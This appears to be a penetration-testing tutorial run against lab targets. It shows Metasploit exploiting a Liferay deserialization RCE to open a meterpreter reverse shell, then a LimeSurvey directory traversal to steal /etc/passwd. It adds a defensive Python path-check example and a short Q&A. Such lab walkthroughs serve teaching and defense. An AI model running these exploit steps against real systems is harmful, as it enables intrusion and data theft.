Liferay is an open source enterprise portal used to build corporate extranets and intranets. It is a web application written in Java and also offers other features such as website development. The above mentioned versions suffer from an RCE vulnerability in the JSONWS (JSON web services) feature: untrusted Java objects are unmarshalled from requests, which allows attackers to execute code as the liferay user.

Let's test this exploit module. We tested it on Liferay Portal version 7.2.0 GA1. Pull and start the docker image of that version as shown below; the pull output is shown in part.

...
aafiaid2bb85: Downloading 57.01MB/66.87MB
...

That is enough to set the target. Load the liferay_java_unmarshalling module as shown below.
msf5 > use exploit/multi/http/liferay_java_unmarshalling
msf5 exploit(multi/http/liferay_java_unmarshalling) > show options

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to Liferay Portal
   VHOST                       no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java
Set all the required options as shown below and use the check command to see whether the target is indeed vulnerable.

msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > check
[*] 172.17.0.2:8080 - The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
msf5 exploit(multi/http/liferay_java_unmarshalling) > run
After all the required options are set, execute the module as shown below.

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://172.17.0.1:8888/
...
[*] Sending stage (53904 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48394) at 2020-06-01 ...
[*] Server stopped.

meterpreter > sysinfo
Computer    : ...
OS          : Linux ...
Meterpreter : java/linux
meterpreter >

As you can see in the above output, we successfully have a meterpreter session; as the module description says, it runs as the liferay user. Note that check only reports that the version MAY be vulnerable: the version string alone does not tell whether a patch has been applied, so confirm it with the full exploit.
Limesurvey Dir Traversal Auxiliary Module

LimeSurvey is a free and open source online survey web app written in PHP and based on a MySQL, SQLite, PostgreSQL or MSSQL database. It allows website users to create surveys, collect responses, create statistics and export data to other apps.

The affected versions of LimeSurvey have a directory traversal vulnerability (local file inclusion) which allows an authenticated attacker to download any arbitrary file from the target. Let's see how this module works. We tested this on LimeSurvey version 4.1.11 hosted on the XAMPP server installed on an Ubuntu 18 machine. Since this is a Linux machine, we will be downloading the "passwd" file.

Let's set the target. Download a vulnerable version of LimeSurvey from https://github.com/LimeSurvey/LimeSurvey/releases. Extract the downloaded zip file and copy the extracted directory to the root directory of the web server as shown below. The first copy fails because the XAMPP directory is owned by root, so repeat it with sudo.

$ mv LimeSurvey-4.1.11-200316 limesurvey
$ cp -r limesurvey /opt/lampp/htdocs/
cp: cannot create directory '/opt/lampp/htdocs/limesurvey': Permission denied
$ sudo cp -r limesurvey /opt/lampp/htdocs/

Change the ownership of the limesurvey folder to the web user (the account XAMPP's Apache runs as; use that account if it differs from www-data on your install), then restart XAMPP; its start-up output ends with "Starting ProFTPD".

$ sudo chown -R www-data:www-data /opt/lampp/htdocs/limesurvey
Now go to the LimeSurvey installer (http://localhost/limesurvey) and click on "Start installation". The installer walks through the following pages: Welcome (language selection), License (accept the license terms), Pre-installation check, Database settings (enter the database details and let the installer create and populate the database), and finally Administrator settings, where you configure the administrator credentials and the further settings for the application administrator. The target is set. Now load the auxiliary/scanner/http/limesurvey_zip_traversals module.
msf5 > use auxiliary/scanner/http/limesurvey_zip_traversals
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > show options

Module options (auxiliary/scanner/http/limesurvey_zip_traversals):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      7                yes       Traversal depth
   FILE       /etc/passwd      yes       The file to retrieve
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to LimeSurvey
   THREADS    1                yes       The number of concurrent threads (max one per host)
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host
Set the required options: the target, the administrator credentials created during installation, and the base path under which LimeSurvey was copied.

msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set rhosts 192.168.36.148
rhosts => 192.168.36.148
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set username admin
username => admin
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set password admin
password => admin
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set targeturi /limesurvey
targeturi => /limesurvey

After all the required options are set, execute the module.

msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[+] 192.168.36.148:80 - ... File saved in: /root/.msf4/loot/...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) >
The file has been successfully retrieved and stored in the Metasploit loot directory. Let's view it.

$ cat /root/.msf4/loot/...
...
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
...
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
...

This is the target system's "passwd" file. DEPTH controls how many "../" segments the module prepends to FILE, so it must be at least the depth of the web application directory below the filesystem root; /etc/passwd is only a proof, and the same request retrieves any file the web server user can read, such as LimeSurvey's own config.php with the database credentials.
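The bug class behind this module is a file path built from user input without checking that the result stays under the web root, and the zip import LimeSurvey offers is the same problem with entry names instead of a request parameter. The following is an added example, not LimeSurvey code: it shows the naive join that lets ../../../../etc/passwd escape, beside the check that stops it, and the equivalent check over zip entry names. The web root and the zip contents are made up.

```python
# Added example (not LimeSurvey code): path traversal in a file-download or
# zip-import feature, the unsafe join beside the safe one. WEB_ROOT is an
# assumed location and the zip entries are constructed.
import io
import os
import zipfile
from pathlib import Path
from typing import Dict, List

WEB_ROOT = "/srv/limesurvey/upload"   # assumed; any directory works


def naive_path(base: str, requested: str) -> str:
    """Vulnerable: join and hope. '..' segments walk out of base, and an
    absolute 'requested' replaces base entirely."""
    return os.path.normpath(os.path.join(base, requested))


def safe_path(base: str, requested: str) -> Path:
    """Resolve first, then insist the result is still inside base. Resolving
    before the check also defeats symlinks and 'a/../../' tricks."""
    base_p = Path(base).resolve()
    target = (base_p / requested).resolve()
    if target != base_p and base_p not in target.parents:
        raise ValueError(f"traversal rejected: {requested!r}")
    return target


def unsafe_zip_entries(data: bytes) -> List[str]:
    """Entry names that would land outside the extraction directory: absolute
    names or any '..' component. Nothing is extracted; the names alone decide."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            p = Path(name)
            if p.is_absolute() or ".." in p.parts:
                bad.append(name)
    return bad


def make_zip(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip with the given (constructed) entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    req = "../../../../etc/passwd"
    print("naive :", naive_path(WEB_ROOT, req))
    try:
        safe_path(WEB_ROOT, req)
    except ValueError as e:
        print("safe  :", e)
    evil = make_zip({"theme/style.css": b"body{}", "../../etc/cron.d/x": b"* * * * * root id\n"})
    print("zip   :", unsafe_zip_entries(evil))
```

The naive version prints /etc/passwd, which is exactly what the module retrieved; the safe version raises. For zip imports, rejecting the archive outright when any entry name is bad is simpler and safer than trying to extract the "good" entries from it.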
Q: Can we use Metasploit from Windows?

A: Yes. There is a Windows version of the Metasploit Framework which can be downloaded and installed on any Windows machine. Note that the Metasploit Framework requires administrative rights to be installed on the Windows system. If any antivirus is installed on the Windows system, it may generate alerts while Metasploit is being installed or used, so don't forget to add the proper exceptions first. Metasploit can be downloaded from https://www.metasploit.com/download.

Q: Who is currently running the Anonymous group?

A: Well, that was an excellent question. I will tell you this, but you should not reveal it to anyone. OK. Promise. Here I am revealing it. The name "anonymous" itself means "not identified by name or nameless", and here you are asking about the Anonymous hacking group. Bro/Sis, all we know about Anonymous is that it is an international hacking group which is decentralized. Decentralized means not having a central command. Although there are reports of some of this group's members being arrested, nobody knows exactly who they are.

Q: What is a brute force attack in cyber security? How can it be prevented?

A: A brute force attack is a password attack in which hackers try a large number of passwords, many every second, until they find the correct one. Normally software called a password cracker is used to do this. Brute force attacks are prevented by limiting the number of times a user can attempt to log in (account lockout or rate limiting); enforcing strong, unique passwords and multi-factor authentication limits what a guessed password is worth.